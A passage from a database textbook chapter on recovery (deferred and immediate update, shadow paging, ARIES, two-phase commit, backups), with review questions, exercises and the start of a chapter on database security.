in the cache buffers until the commit point.

We can state a typical deferred update protocol as follows:

1. A transaction cannot change the database on disk until it reaches its commit
point.

2. A transaction does not reach its commit point until all its REDO-type log
entries are recorded in the log and the log buffer is force-written to disk.

Notice that step 2 of this protocol is a restatement of the write-ahead logging (WAL)
protocol. Because the database is never updated on disk until after the transaction
commits, there is never a need to UNDO any operations. REDO is needed in case the
system fails after a transaction commits but before all its changes are recorded in the
database on disk. In this case, the transaction operations are redone from the log
entries during recovery.

For multiuser systems with concurrency control, the concurrency control and
recovery processes are interrelated. Consider a system in which concurrency control
uses strict two-phase locking, so the locks on items remain in effect until the trans-
action reaches its commit point. After that, the locks can be released. This ensures
strict and serializable schedules. Assuming that [checkpoint] entries are included in
the log, a possible recovery algorithm for this case, which we call RDU_M (Recovery
using Deferred Update in a Multiuser environment), is given next.

Procedure RDU_M (NO-UNDO/REDO with checkpoints). Use two lists of
transactions maintained by the system: the committed transactions T since the
last checkpoint (commit list), and the active transactions T� (active list).
REDO all the WRITE operations of the committed transactions from the log, in
the order in which they were written into the log. The transactions that are active
and did not commit are effectively canceled and must be resubmitted.

The REDO procedure is defined as follows:

Procedure REDO (WRITE_OP). Redoing a write_item operation WRITE_OP con-
sists of examining its log entry [write_item, T, X, new_value] and setting the value
of item X in the database to new_value, which is the after image (AFIM).

Figure 2 illustrates a timeline for a possible schedule of executing transactions.
When the checkpoint was taken at time t1, transaction T1 had committed, whereas
transactions T3 and T4 had not. Before the system crash at time t2, T3 and T2 were
committed but not T4 and T5. According to the RDU_M method, there is no need to
redo the write_item operations of transaction T1—or any transactions committed
before the last checkpoint time t1. The write_item operations of T2 and T3 must be
redone, however, because both transactions reached their commit points after the
last checkpoint. Recall that the log is force-written before committing a transaction.
Transactions T4 and T5 are ignored: They are effectively canceled or rolled back
because none of their write_item operations were recorded in the database on disk
under the deferred update protocol.

819

Database Recovery Techniques

System crash TimeCheckpoint

T2
T1

T3

T5

T4

t1 t2

Figure 2
An example of a
recovery timeline to
illustrate the effect of
checkpointing.

We can make the NO-UNDO/REDO recovery algorithm more efficient by noting that,
if a data item X has been updated—as indicated in the log entries—more than once
by committed transactions since the last checkpoint, it is only necessary to REDO
the last update of X from the log during recovery because the other updates would be
overwritten by this last REDO. In this case, we start from the end of the log; then,
whenever an item is redone, it is added to a list of redone items. Before REDO is
applied to an item, the list is checked; if the item appears on the list, it is not redone
again, since its last value has already been recovered.

If a transaction is aborted for any reason (say, by the deadlock detection method), it
is simply resubmitted, since it has not changed the database on disk. A drawback of
the method described here is that it limits the concurrent execution of transactions
because all write-locked items remain locked until the transaction reaches its commit
point. Additionally, it may require excessive buffer space to hold all updated items
until the transactions commit. The method’s main benefit is that transaction oper-
ations never need to be undone, for two reasons:

1. A transaction does not record any changes in the database on disk until after
it reaches its commit point—that is, until it completes its execution success-
fully. Hence, a transaction is never rolled back because of failure during
transaction execution.

2. A transaction will never read the value of an item that is written by an
uncommitted transaction, because items remain locked until a transaction
reaches its commit point. Hence, no cascading rollback will occur.

Figure 3 shows an example of recovery for a multiuser system that utilizes the recov-
ery and concurrency control method just described.

3 Recovery Techniques Based
on Immediate Update

In these techniques, when a transaction issues an update command, the database on
disk can be updated immediately, without any need to wait for the transaction to
reach its commit point. Notice that it is not a requirement that every update be

820

Database Recovery Techniques

(a) T1
read_item(A)
read_item(D)

write_item(D)

[checkpoint]

(b)

read_item(B)
write_item(B)

read_item(D)

write_item(D)

read_item(A)
write_item(A)

read_item(C)

write_item(C)

read_item(B)
write_item(B)

read_item(A)

write_item(A)

[start_transaction,T1]

[start_transaction, T2]

[write_item, T1, D, 20]

[commit, T1]

[commit, T4]

[start_transaction, T4]

[start_transaction, T3]

[write_item, T4, B, 15]

[write_item, T2, B, 12]

[write_item, T4, A, 20]

[write_item, T3, A, 30]

[write_item,T2, D, 25]

T2 and T3 are ignored because they did not reach their commit points.

T4 is redone because its commit point is after the last system checkpoint.

System crash

T2 T3 T4

Figure 3
An example of recov-
ery using deferred
update with concurrent
transactions. (a) The
READ and WRITE
operations of four
transactions. (b)
System log at the
point of crash.

applied immediately to disk; it is just possible that some updates are applied to disk
before the transaction commits.

Provisions must be made for undoing the effect of update operations that have been
applied to the database by a failed transaction. This is accomplished by rolling back
the transaction and undoing the effect of the transaction’s write_item operations.
Therefore, the UNDO-type log entries, which include the old value (BFIM) of the
item, must be stored in the log. Because UNDO can be needed during recovery,
these methods follow a steal strategy for deciding when updated main memory
buffers can be written back to disk (see Section 1.3). Theoretically, we can distin-
guish two main categories of immediate update algorithms. If the recovery tech-
nique ensures that all updates of a transaction are recorded in the database on disk
before the transaction commits, there is never a need to REDO any operations of
committed transactions. This is called the UNDO/NO-REDO recovery algorithm.
In this method, all updates by a transaction must be recorded on disk before the
transaction commits, so that REDO is never needed. Hence, this method must utilize

821

Database Recovery Techniques

the force strategy for deciding when updated main memory buffers are written
back to disk (see Section 1.3).

If the transaction is allowed to commit before all its changes are written to the data-
base, we have the most general case, known as the UNDO/REDO recovery algo-
rithm. In this case, the steal/no-force strategy is applied (see Section 1.3). This is
also the most complex technique. We will outline an UNDO/REDO recovery algo-
rithm and leave it as an exercise for the reader to develop the UNDO/NO-REDO vari-
ation. In Section 5, we describe a more practical approach known as the ARIES
recovery technique.

When concurrent execution is permitted, the recovery process again depends on the
protocols used for concurrency control. The procedure RIU_M (Recovery using
Immediate Updates for a Multiuser environment) outlines a recovery algorithm for
concurrent transactions with immediate update (UNDO/REDO recovery). Assume
that the log includes checkpoints and that the concurrency control protocol pro-
duces strict schedules—as, for example, the strict two-phase locking protocol does.
Recall that a strict schedule does not allow a transaction to read or write an item
unless the transaction that last wrote the item has committed (or aborted and rolled
back). However, deadlocks can occur in strict two-phase locking, thus requiring
abort and UNDO of transactions. For a strict schedule, UNDO of an operation
requires changing the item back to its old value (BFIM).

Procedure RIU_M (UNDO/REDO with checkpoints).

1. Use two lists of transactions maintained by the system: the committed trans-
actions since the last checkpoint and the active transactions.

2. Undo all the write_item operations of the active (uncommitted) transactions,
using the UNDO procedure. The operations should be undone in the reverse
of the order in which they were written into the log.

3. Redo all the write_item operations of the committed transactions from the log,
in the order in which they were written into the log, using the REDO proce-
dure defined earlier.

The UNDO procedure is defined as follows:

Procedure UNDO (WRITE_OP). Undoing a write_item operation write_op con-
sists of examining its log entry [write_item, T, X, old_value, new_value] and setting
the value of item X in the database to old_value, which is the before image
(BFIM). Undoing a number of write_item operations from one or more trans-
actions from the log must proceed in the reverse order from the order in which
the operations were written in the log.

As we discussed for the NO-UNDO/REDO procedure, step 3 is more efficiently done
by starting from the end of the log and redoing only the last update of each item X.
Whenever an item is redone, it is added to a list of redone items and is not redone
again. A similar procedure can be devised to improve the efficiency of step 2 so that
an item can be undone at most once during recovery. In this case, the earliest
UNDO is applied first by scanning the log in the forward direction (starting from the

822

Database Recovery Techniques

Current directory
(after updating
pages 2, 5)

Database disk
blocks (pages)

Shadow directory
(not updated)

Page 5 (old)

Page 1

Page 4

Page 2 (old)

Page 3

Page 6

Page 2 (new)

Page 5 (new)

1

2

3

4

5

6

1

2

3

4

5

6

Figure 4
An example of shadow paging.

beginning of the log). Whenever an item is undone, it is added to a list of undone
items and is not undone again.

4 Shadow Paging
This recovery scheme does not require the use of a log in a single-user environment.
In a multiuser environment, a log may be needed for the concurrency control
method. Shadow paging considers the database to be made up of a number of fixed-
size disk pages (or disk blocks)—say, n—for recovery purposes. A directory with n
entries5 is constructed, where the ith entry points to the ith database page on disk.
The directory is kept in main memory if it is not too large, and all references—reads
or writes—to database pages on disk go through it. When a transaction begins exe-
cuting, the current directory—whose entries point to the most recent or current
database pages on disk—is copied into a shadow directory. The shadow directory is
then saved on disk while the current directory is used by the transaction.

During transaction execution, the shadow directory is never modified. When a
write_item operation is performed, a new copy of the modified database page is cre-
ated, but the old copy of that page is not overwritten. Instead, the new page is writ-
ten elsewhere—on some previously unused disk block. The current directory entry
is modified to point to the new disk block, whereas the shadow directory is not
modified and continues to point to the old unmodified disk block. Figure 4 illus-
trates the concepts of shadow and current directories. For pages updated by the
transaction, two versions are kept. The old version is referenced by the shadow
directory and the new version by the current directory.

5The directory is similar to the page table maintained by the operating system for each process.

823

Database Recovery Techniques

To recover from a failure during transaction execution, it is sufficient to free the
modified database pages and to discard the current directory. The state of the data-
base before transaction execution is available through the shadow directory, and
that state is recovered by reinstating the shadow directory. The database thus is
returned to its state prior to the transaction that was executing when the crash
occurred, and any modified pages are discarded. Committing a transaction corre-
sponds to discarding the previous shadow directory. Since recovery involves neither
undoing nor redoing data items, this technique can be categorized as a NO-
UNDO/NO-REDO technique for recovery.

In a multiuser environment with concurrent transactions, logs and checkpoints must
be incorporated into the shadow paging technique. One disadvantage of shadow
paging is that the updated database pages change location on disk. This makes it dif-
ficult to keep related database pages close together on disk without complex storage
management strategies. Furthermore, if the directory is large, the overhead of writ-
ing shadow directories to disk as transactions commit is significant. A further com-
plication is how to handle garbage collection when a transaction commits. The old
pages referenced by the shadow directory that have been updated must be released
and added to a list of free pages for future use. These pages are no longer needed after
the transaction commits. Another issue is that the operation to migrate between cur-
rent and shadow directories must be implemented as an atomic operation.

5 The ARIES Recovery Algorithm
We now describe the ARIES algorithm as an example of a recovery algorithm used
in database systems. It is used in many relational database-related products of IBM.
ARIES uses a steal/no-force approach for writing, and it is based on three concepts:
write-ahead logging, repeating history during redo, and logging changes during
undo. We discussed write-ahead logging in Section 1.3. The second concept,
repeating history, means that ARIES will retrace all actions of the database system
prior to the crash to reconstruct the database state when the crash occurred.
Transactions that were uncommitted at the time of the crash (active transactions)
are undone. The third concept, logging during undo, will prevent ARIES from
repeating the completed undo operations if a failure occurs during recovery, which
causes a restart of the recovery process.

The ARIES recovery procedure consists of three main steps: analysis, REDO, and
UNDO. The analysis step identifies the dirty (updated) pages in the buffer6 and the
set of transactions active at the time of the crash. The appropriate point in the log
where the REDO operation should start is also determined. The REDO phase actu-
ally reapplies updates from the log to the database. Generally, the REDO operation is
applied only to committed transactions. However, this is not the case in ARIES.
Certain information in the ARIES log will provide the start point for REDO, from

6The actual buffers may be lost during a crash, since they are in main memory. Additional tables stored in
the log during checkpointing (Dirty Page Table, Transaction Table) allows ARIES to identify this informa-
tion (as discussed later in this section).

824

Database Recovery Techniques

which REDO operations are applied until the end of the log is reached. Additionally,
information stored by ARIES and in the data pages will allow ARIES to determine
whether the operation to be redone has actually been applied to the database and
therefore does not need to be reapplied. Thus, only the necessary REDO operations
are applied during recovery. Finally, during the UNDO phase, the log is scanned
backward and the operations of transactions that were active at the time of the crash
are undone in reverse order. The information needed for ARIES to accomplish its
recovery procedure includes the log, the Transaction Table, and the Dirty Page
Table. Additionally, checkpointing is used. These tables are maintained by the trans-
action manager and written to the log during checkpointing.

In ARIES, every log record has an associated log sequence number (LSN) that is
monotonically increasing and indicates the address of the log record on disk. Each
LSN corresponds to a specific change (action) of some transaction. Also, each data
page will store the LSN of the latest log record corresponding to a change for that page.
A log record is written for any of the following actions: updating a page (write),
committing a transaction (commit), aborting a transaction (abort), undoing an
update (undo), and ending a transaction (end). The need for including the first
three actions in the log has been discussed, but the last two need some explanation.
When an update is undone, a compensation log record is written in the log. When a
transaction ends, whether by committing or aborting, an end log record is written.

Common fields in all log records include the previous LSN for that transaction, the
transaction ID, and the type of log record. The previous LSN is important because it
links the log records (in reverse order) for each transaction. For an update (write)
action, additional fields in the log record include the page ID for the page that con-
tains the item, the length of the updated item, its offset from the beginning of the
page, the before image of the item, and its after image.

Besides the log, two tables are needed for efficient recovery: the Transaction Table
and the Dirty Page Table, which are maintained by the transaction manager. When
a crash occurs, these tables are rebuilt in the analysis phase of recovery. The
Transaction Table contains an entry for each active transaction, with information
such as the transaction ID, transaction status, and the LSN of the most recent log
record for the transaction. The Dirty Page Table contains an entry for each dirty
page in the buffer, which includes the page ID and the LSN corresponding to the
earliest update to that page.

Checkpointing in ARIES consists of the following: writing a begin_checkpoint record
to the log, writing an end_checkpoint record to the log, and writing the LSN of the
begin_checkpoint record to a special file. This special file is accessed during recovery
to locate the last checkpoint information. With the end_checkpoint record, the con-
tents of both the Transaction Table and Dirty Page Table are appended to the end of
the log. To reduce the cost, fuzzy checkpointing is used so that the DBMS can con-
tinue to execute transactions during checkpointing (see Section 1.4). Additionally,
the contents of the DBMS cache do not have to be flushed to disk during check-
point, since the Transaction Table and Dirty Page Table—which are appended to the
log on disk—contain the information needed for recovery. Note that if a crash

825

Database Recovery Techniques

occurs during checkpointing, the special file will refer to the previous checkpoint,
which is used for recovery.

After a crash, the ARIES recovery manager takes over. Information from the last
checkpoint is first accessed through the special file. The analysis phase starts at the
begin_checkpoint record and proceeds to the end of the log. When the end_checkpoint
record is encountered, the Transaction Table and Dirty Page Table are accessed
(recall that these tables were written in the log during checkpointing). During
analysis, the log records being analyzed may cause modifications to these two tables.
For instance, if an end log record was encountered for a transaction T in the
Transaction Table, then the entry for T is deleted from that table. If some other type
of log record is encountered for a transaction T�, then an entry for T� is inserted into
the Transaction Table, if not already present, and the last LSN field is modified. If
the log record corresponds to a change for page P, then an entry would be made for
page P (if not present in the table) and the associated LSN field would be modified.
When the analysis phase is complete, the necessary information for REDO and
UNDO has been compiled in the tables.

The REDO phase follows next. To reduce the amount of unnecessary work, ARIES
starts redoing at a point in the log where it knows (for sure) that previous changes
to dirty pages have already been applied to the database on disk. It can determine this
by finding the smallest LSN, M, of all the dirty pages in the Dirty Page Table, which
indicates the log position where ARIES needs to start the REDO phase. Any changes
corresponding to an LSN < M, for redoable transactions, must have already been propagated to disk or already been overwritten in the buffer; otherwise, those dirty pages with that LSN would be in the buffer (and the Dirty Page Table). So, REDO starts at the log record with LSN = M and scans forward to the end of the log. For each change recorded in the log, the REDO algorithm would verify whether or not the change has to be reapplied. For example, if a change recorded in the log pertains to page P that is not in the Dirty Page Table, then this change is already on disk and does not need to be reapplied. Or, if a change recorded in the log (with LSN = N, say) pertains to page P and the Dirty Page Table contains an entry for P with LSN greater than N, then the change is already present. If neither of these two conditions hold, page P is read from disk and the LSN stored on that page, LSN(P), is compared with N. If N < LSN(P), then the change has been applied and the page does not need to be rewritten to disk. Once the REDO phase is finished, the database is in the exact state that it was in when the crash occurred. The set of active transactions—called the undo_set—has been identified in the Transaction Table during the analysis phase. Now, the UNDO phase proceeds by scanning backward from the end of the log and undoing the appropriate actions. A compensating log record is written for each action that is undone. The UNDO reads backward in the log until every action of the set of trans- actions in the undo_set has been undone. When this is completed, the recovery process is finished and normal processing can begin again. Consider the recovery example shown in Figure 5. There are three transactions: T1, T2, and T3. T1 updates page C, T2 updates pages B and C, and T3 updates page A. 826 Database Recovery Techniques TRANSACTION TABLE Last_lsn Status(b) (c) (a) Lsn 1 Last_lsn Tran_id Type Page_id Other_information Transaction_id TRANSACTION TABLE DIRTY PAGE TABLE Transaction_id T1 3 Last_lsn commit Status Page_id C Lsn 1 T3 T2 8 6 in progress commit A B 6 2 T2 T1 DIRTY PAGE TABLE Page_id C Lsn 1 B 22 3 commit in progress 8 7 6 5 4 3 2 0 7 2 0 end checkpoint begin checkpoint 1 0 T1 T2 T1 T3 T2 T2 update commit update update commit update B C A C . . . . . . . . . . . . . . . . . . Figure 5 An example of recovery in ARIES. (a) The log at point of crash. (b) The Transaction and Dirty Page Tables at time of checkpoint. (c) The Transaction and Dirty Page Tables after the analysis phase. Figure 5(a) shows the partial contents of the log, and Figure 5(b) shows the contents of the Transaction Table and Dirty Page Table. Now, suppose that a crash occurs at this point. Since a checkpoint has occurred, the address of the associated begin_checkpoint record is retrieved, which is location 4. The analysis phase starts from location 4 until it reaches the end. The end_checkpoint record would contain the Transaction Table and Dirty Page Table in Figure 5(b), and the analysis phase will further reconstruct these tables. When the analysis phase encounters log record 6, a new entry for transaction T3 is made in the Transaction Table and a new entry for page A is made in the Dirty Page Table. After log record 8 is analyzed, the status of transaction T2 is changed to committed in the Transaction Table. Figure 5(c) shows the two tables after the analysis phase. 827 Database Recovery Techniques For the REDO phase, the smallest LSN in the Dirty Page Table is 1. Hence the REDO will start at log record 1 and proceed with the REDO of updates. The LSNs {1, 2, 6, 7} corresponding to the updates for pages C, B, A, and C, respectively, are not less than the LSNs of those pages (as shown in the Dirty Page Table). So those data pages will be read again and the updates reapplied from the log (assuming the actual LSNs stored on those data pages are less then the corresponding log entry). At this point, the REDO phase is finished and the UNDO phase starts. From the Transaction Table (Figure 5(c)), UNDO is applied only to the active transaction T3. The UNDO phase starts at log entry 6 (the last update for T3) and proceeds backward in the log. The backward chain of updates for transaction T3 (only log record 6 in this example) is followed and undone. 6 Recovery in Multidatabase Systems So far, we have implicitly assumed that a transaction accesses a single database. In some cases, a single transaction, called a multidatabase transaction, may require access to multiple databases. These databases may even be stored on different types of DBMSs; for example, some DBMSs may be relational, whereas others are object- oriented, hierarchical, or network DBMSs. In such a case, each DBMS involved in the multidatabase transaction may have its own recovery technique and transaction manager separate from those of the other DBMSs. This situation is somewhat simi- lar to the case of a distributed database management system, where parts of the database reside at different sites that are connected by a communication network. To maintain the atomicity of a multidatabase transaction, it is necessary to have a two-level recovery mechanism. A global recovery manager, or coordinator, is needed to maintain information needed for recovery, in addition to the local recov- ery managers and the information they maintain (log, tables). The coordinator usu- ally follows a protocol called the two-phase commit protocol, whose two phases can be stated as follows: ■ Phase 1. When all participating databases signal the coordinator that the part of the multidatabase transaction involving each has concluded, the coordinator sends a message prepare for commit to each participant to get ready for committing the transaction. Each participating database receiving that message will force-write all log records and needed information for local recovery to disk and then send a ready to commit or OK signal to the coordinator. If the force-writing to disk fails or the local transaction cannot commit for some reason, the participating database sends a cannot commit or not OK signal to the coordinator. If the coordinator does not receive a reply from the database within a certain time out interval, it assumes a not OK response. ■ Phase 2. If all participating databases reply OK, and the coordinator’s vote is also OK, the transaction is successful, and the coordinator sends a commit signal for the transaction to the participating databases. Because all the local 828 Database Recovery Techniques effects of the transaction and information needed for local recovery have been recorded in the logs of the participating databases, recovery from fail- ure is now possible. Each participating database completes transaction com- mit by writing a [commit] entry for the transaction in the log and permanently updating the database if needed. On the other hand, if one or more of the participating databases or the coordinator have a not OK response, the transaction has failed, and the coordinator sends a message to roll back or UNDO the local effect of the transaction to each participating database. This is done by undoing the transaction operations, using the log. The net effect of the two-phase commit protocol is that either all participating data- bases commit the effect of the transaction or none of them do. In case any of the participants—or the coordinator—fails, it is always possible to recover to a state where either the transaction is committed or it is rolled back. A failure during or before Phase 1 usually requires the transaction to be rolled back, whereas a failure during Phase 2 means that a successful transaction can recover and commit. 7 Database Backup and Recovery from Catastrophic Failures So far, all the techniques we have discussed apply to noncatastrophic failures. A key assumption has been that the system log is maintained on the disk and is not lost as a result of the failure. Similarly, the shadow directory must be stored on disk to allow recovery when shadow paging is used. The recovery techniques we have dis- cussed use the entries in the system log or the shadow directory to recover from fail- ure by bringing the database back to a consistent state. The recovery manager of a DBMS must also be equipped to handle more cata- strophic failures such as disk crashes. The main technique used to handle such crashes is a database backup, in which the whole database and the log are periodi- cally copied onto a cheap storage medium such as magnetic tapes or other large capacity offline storage devices. In case of a catastrophic system failure, the latest backup copy can be reloaded from the tape to the disk, and the system can be restarted. Data from critical applications such as banking, insurance, stock market, and other databases is periodically backed up in its entirety and moved to physically separate safe locations. Subterranean storage vaults have been used to protect such data from flood, storm, earthquake, or fire damage. Events like the 9/11 terrorist attack in New York (in 2001) and the Katrina hurricane disaster in New Orleans (in 2005) have created a greater awareness of disaster recovery of business-critical databases. To avoid losing all the effects of transactions that have been executed since the last backup, it is customary to back up the system log at more frequent intervals than full database backup by periodically copying it to magnetic tape. The system log is usually substantially smaller than the database itself and hence can be backed up more frequently. Therefore, users do not lose all transactions they have performed 829 Database Recovery Techniques since the last database backup. All committed transactions recorded in the portion of the system log that has been backed up to tape can have their effect on the data- base redone. A new log is started after each database backup. Hence, to recover from disk failure, the database is first recreated on disk from its latest backup copy on tape. Following that, the effects of all the committed transactions whose operations have been recorded in the backed-up copies of the system log are reconstructed. 8 Summary In this chapter we discussed the techniques for recovery from transaction failures. The main goal of recovery is to ensure the atomicity property of a transaction. If a transaction fails before completing its execution, the recovery mechanism has to make sure that the transaction has no lasting effects on the database. First we gave an informal outline for a recovery process and then we discussed system concepts for recovery. These included a discussion of caching, in-place updating versus shad- owing, before and after images of a data item, UNDO versus REDO recovery opera- tions, steal/no-steal and force/no-force policies, system checkpointing, and the write-ahead logging protocol. Next we discussed two different approaches to recovery: deferred update and imme- diate update. Deferred update techniques postpone any actual updating of the data- base on disk until a transaction reaches its commit point. The transaction force-writes the log to disk before recording the updates in the database. This approach, when used with certain concurrency control methods, is designed never to require transaction rollback, and recovery simply consists of redoing the opera- tions of transactions committed after the last checkpoint from the log. The disad- vantage is that too much buffer space may be needed, since updates are kept in the buffers and are not applied to disk until a transaction commits. Deferred update can lead to a recovery algorithm known as NO-UNDO/REDO. Immediate update tech- niques may apply changes to the database on disk before the transaction reaches a successful conclusion. Any changes applied to the database must first be recorded in the log and force-written to disk so that these operations can be undone if neces- sary. We also gave an overview of a recovery algorithm for immediate update known as UNDO/REDO. Another algorithm, known as UNDO/NO-REDO, can also be devel- oped for immediate update if all transaction actions are recorded in the database before commit. We discussed the shadow paging technique for recovery, which keeps track of old database pages by using a shadow directory. This technique, which is classified as NO-UNDO/NO-REDO, does not require a log in single-user systems but still needs the log for multiuser systems. We also presented ARIES, a specific recovery scheme used in many of IBM’s relational database products. Then we discussed the two- phase commit protocol, which is used for recovery from failures involving multi- database transactions. Finally, we discussed recovery from catastrophic failures, which is typically done by backing up the database and the log to tape. The log can be backed up more frequently than the database, and the backup log can be used to redo operations starting from the last database backup. 830 Database Recovery Techniques Review Questions 1. Discuss the different types of transaction failures. What is meant by cata- strophic failure? 2. Discuss the actions taken by the read_item and write_item operations on a database. 3. What is the system log used for? What are the typical kinds of entries in a system log? What are checkpoints, and why are they important? What are transaction commit points, and why are they important? 4. How are buffering and caching techniques used by the recovery subsystem? 5. What are the before image (BFIM) and after image (AFIM) of a data item? What is the difference between in-place updating and shadowing, with respect to their handling of BFIM and AFIM? 6. What are UNDO-type and REDO-type log entries? 7. Describe the write-ahead logging protocol. 8. Identify three typical lists of transactions that are maintained by the recovery subsystem. 9. What is meant by transaction rollback? What is meant by cascading rollback? Why do practical recovery methods use protocols that do not permit cascad- ing rollback? Which recovery techniques do not require any rollback? 10. Discuss the UNDO and REDO operations and the recovery techniques that use each. 11. Discuss the deferred update technique of recovery. What are the advantages and disadvantages of this technique? Why is it called the NO-UNDO/REDO method? 12. How can recovery handle transaction operations that do not affect the data- base, such as the printing of reports by a transaction? 13. Discuss the immediate update recovery technique in both single-user and multiuser environments. What are the advantages and disadvantages of immediate update? 14. What is the difference between the UNDO/REDO and the UNDO/NO-REDO algorithms for recovery with immediate update? Develop the outline for an UNDO/NO-REDO algorithm. 15. Describe the shadow paging recovery technique. Under what circumstances does it not require a log? 16. Describe the three phases of the ARIES recovery method. 17. What are log sequence numbers (LSNs) in ARIES? How are they used? What information do the Dirty Page Table and Transaction Table contain? Describe how fuzzy checkpointing is used in ARIES. 831 Database Recovery Techniques [checkpoint] [start_transaction, T1] [start_transaction, T2] [start_transaction, T3] [read_item, T1, A] [read_item, T1, D] [read_item, T4, D] [read_item, T2, D] [read_item, T2, B] [write_item, T1, D, 20, 25] [write_item, T2, B, 12, 18] [read_item, T4, A] [write_item, T4, D, 25, 15] [write_item, T3, C, 30, 40] [write_item, T2, D, 15, 25] [write_item, T4, A, 30, 20] [commit, T1] [commit, T4] [start_transaction, T4] System crash Figure 6 A sample schedule and its corresponding log. 18. What do the terms steal/no-steal and force/no-force mean with regard to buffer management for transaction processing? 19. Describe the two-phase commit protocol for multidatabase transactions. 20. Discuss how disaster recovery from catastrophic failures is handled. Exercises 21. Suppose that the system crashes before the [read_item, T3, A] entry is written to the log in Figure 1(b). Will that make any difference in the recovery process? 22. Suppose that the system crashes before the [write_item, T2, D, 25, 26] entry is written to the log in Figure 1(b). Will that make any difference in the recov- ery process? 23. Figure 6 shows the log corresponding to a particular schedule at the point of a system crash for four transactions T1, T2, T3, and T4. Suppose that we use the immediate update protocol with checkpointing. Describe the recovery process from the system crash. Specify which transactions are rolled back, which operations in the log are redone and which (if any) are undone, and whether any cascading rollback takes place. 832 Database Recovery Techniques 24. Suppose that we use the deferred update protocol for the example in Figure 6. Show how the log would be different in the case of deferred update by removing the unnecessary log entries; then describe the recovery process, using your modified log. Assume that only REDO operations are applied, and specify which operations in the log are redone and which are ignored. 25. How does checkpointing in ARIES differ from checkpointing as described in Section 1.4? 26. How are log sequence numbers used by ARIES to reduce the amount of REDO work needed for recovery? Illustrate with an example using the infor- mation shown in Figure 5. You can make your own assumptions as to when a page is written to disk. 27. What implications would a no-steal/force buffer management policy have on checkpointing and recovery? Choose the correct answer for each of the following multiple-choice questions: 28. Incremental logging with deferred updates implies that the recovery system must necessarily a. store the old value of the updated item in the log. b. store the new value of the updated item in the log. c. store both the old and new value of the updated item in the log. d. store only the Begin Transaction and Commit Transaction records in the log. 29. The write-ahead logging (WAL) protocol simply means that a. writing of a data item should be done ahead of any logging operation. b. the log record for an operation should be written before the actual data is written. c. all log records should be written before a new transaction begins execu- tion. d. the log never needs to be written to disk. 30. In case of transaction failure under a deferred update incremental logging scheme, which of the following will be needed? a. an undo operation b. a redo operation c. an undo and redo operation d. none of the above 31. For incremental logging with immediate updates, a log record for a transac- tion would contain a. a transaction name, a data item name, and the old and new value of the item. 833 Database Recovery Techniques b. a transaction name, a data item name, and the old value of the item. c. a transaction name, a data item name, and the new value of the item. d. a transaction name and a data item name. 32. For correct behavior during recovery, undo and redo operations must be a. commutative. b. associative. c. idempotent. d. distributive. 33. When a failure occurs, the log is consulted and each operation is either undone or redone. This is a problem because a. searching the entire log is time consuming. b. many redos are unnecessary. c. both (a) and (b). d. none of the above. 34. When using a log-based recovery scheme, it might improve performance as well as providing a recovery mechanism by a. writing the log records to disk when each transaction commits. b. writing the appropriate log records to disk during the transaction’s execu- tion. c. waiting to write the log records until multiple transactions commit and writing them as a batch. d. never writing the log records to disk. 35. There is a possibility of a cascading rollback when a. a transaction writes items that have been written only by a committed transaction. b. a transaction writes an item that is previously written by an uncommitted transaction. c. a transaction reads an item that is previously written by an uncommitted transaction. d. both (b) and (c). 36. To cope with media (disk) failures, it is necessary a. for the DBMS to only execute transactions in a single user environment. b. to keep a redundant copy of the database. c. to never abort a transaction. d. all of the above. 834 37. If the shadowing approach is used for flushing a data item back to disk, then a. the item is written to disk only after the transaction commits. b. the item is written to a different location on disk. c. the item is written to disk before the transaction commits. d. the item is written to the same disk location from which it was read. Selected Bibliography The books by Bernstein et al. (1987) and Papadimitriou (1986) are devoted to the theory and principles of concurrency control and recovery. The book by Gray and Reuter (1993) is an encyclopedic work on concurrency control, recovery, and other transaction-processing issues. Verhofstad (1978) presents a tutorial and survey of recovery techniques in database systems. Categorizing algorithms based on their UNDO/REDO characteristics is dis- cussed in Haerder and Reuter (1983) and in Bernstein et al. (1983). Gray (1978) dis- cusses recovery, along with other system aspects of implementing operating systems for databases. The shadow paging technique is discussed in Lorie (1977), Verhofstad (1978), and Reuter (1980). Gray et al. (1981) discuss the recovery mechanism in SYSTEM R. Lockemann and Knutsen (1968), Davies (1973), and Bjork (1973) are early papers that discuss recovery. Chandy et al. (1975) discuss transaction rollback. Lilien and Bhargava (1985) discuss the concept of integrity block and its use to improve the efficiency of recovery. Recovery using write-ahead logging is analyzed in Jhingran and Khedkar (1992) and is used in the ARIES system (Mohan et al. 1992). More recent work on recovery includes compensating transactions (Korth et al. 1990) and main memory database recovery (Kumar 1991). The ARIES recovery algorithms (Mohan et al. 1992) have been quite successful in practice. Franklin et al. (1992) discusses recovery in the EXODUS system. Two books by Kumar and Hsu (1998) and Kumar and Song (1998) discuss recovery in detail and contain descriptions of recovery methods used in a number of existing relational database products. Examples of page replacement strategies that are specific for databases are discussed in Chou and DeWitt (1985) and Pazos et al. (2006). Database Recovery Techniques 835 Database Security This chapter discusses techniques for securing data-bases against a variety of threats. It also presents schemes of providing access privileges to authorized users. Some of the security threats to databases—such as SQL Injection—will be presented. At the end of the chapter we also summarize how a commercial RDBMS—specifically, the Oracle sys- tem—provides different types of security. We start in Section 1 with an introduc- tion to security issues and the threats to databases, and we give an overview of the control measures that are covered in the rest of this chapter. We also comment on the relationship between data security and privacy as it applies to personal informa- tion. Section 2 discusses the mechanisms used to grant and revoke privileges in rela- tional database systems and in SQL, mechanisms that are often referred to as discretionary access control. In Section 3, we present an overview of the mecha- nisms for enforcing multiple levels of security—a particular concern in database system security that is known as mandatory access control. Section 3 also intro- duces the more recently developed strategies of role-based access control, and label-based and row-based security. Section 3 also provides a brief discussion of XML access control. Section 4 discusses a major threat to databases called SQL Injection, and discusses some of the proposed preventive measures against it. Section 5 briefly discusses the security problem in statistical databases. Section 6 introduces the topic of flow control and mentions problems associated with covert channels. Section 7 provides a brief summary of encryption and symmetric key and asymmetric (public) key infrastructure schemes. It also discusses digital certificates. Section 8 introduces privacy-preserving techniques, and Section 9 presents the cur- rent challenges to database security. In Section 10, we discuss Oracle label-based security. Finally, Section 11 summarizes the chapter. Readers who are interested only in basic database security mechanisms will find it sufficient to cover the mate- rial in Sections 1 and 2. From Chapter 24 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison- Wesley. All rights reserved. 836 Database Security 1 Introduction to Database Security Issues1 1.1 Types of Security Database security is a broad area that addresses many issues, including the following: ■ Various legal and ethical issues regarding the right to access certain informa- tion—for example, some information may be deemed to be private and can- not be accessed legally by unauthorized organizations or persons. In the United States, there are numerous laws governing privacy of information. ■ Policy issues at the governmental, institutional, or corporate level as to 